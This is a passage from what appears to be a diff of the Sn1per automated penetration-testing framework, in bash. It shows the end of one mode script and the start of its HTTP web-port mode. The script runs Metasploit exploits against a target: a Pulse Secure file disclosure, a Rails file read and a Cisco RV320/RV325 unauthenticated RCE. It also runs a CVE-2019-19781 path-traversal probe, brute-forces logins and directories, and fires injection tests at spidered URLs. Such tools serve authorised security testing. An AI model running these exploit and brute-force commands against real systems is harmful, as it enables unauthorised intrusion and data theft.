echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PULSE SECURE VPN ARBITRARY FILE DISCLOSURE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use gather/pulse_secure_file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CITRIX GATEWAY ARBITRARY CODE EXECUTION VULNERABILITY CVE-2019-19781 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -vk --path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You dont have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt || echo "MITIGATED: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING RAILS FILE EXPOSURE EXPLOIT CVE-2019-5418 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/gather/rails_doubletap_file_read; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CISCO RV320 AND RV325 UNAUTHENTICATED RCE EXPLOIT CVE-2019-1653 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/linux/http/cisco_rv32x_rce; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw 2> /dev/null
fi

457
modes/webporthttp.sh Normal file
View File

@@ -0,0 +1,457 @@
# WEBPORTHTTP MODE #####################################################################################################
if [[ "$MODE" = "webporthttp" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
port_http=$PORT
if [[ -z "$port_http" ]]; then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R -L --insecure http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
if [[ "$WAFWOOF" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http-port80.txt 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
echo ""
fi
if [[ "$WIG" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-http-$PORT
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http-$PORT > $LOOT_DIR/web/wig-$TARGET-http-$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/wig-$TARGET-http-$PORT 2> /dev/null
fi
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u http://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http-port$PORT.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:$PORT
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
echo ""
fi
if [[ "$NMAP_SCRIPTS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u http://$TARGET:$PORT -l 3 -v n 2> /dev/null
cp -f /usr/share/blackwidow/"$TARGET"_"$PORT"/"$TARGET"_"$PORT"-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http-${PORT}.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-http.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd -i $TARGET -p ${PORT} | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
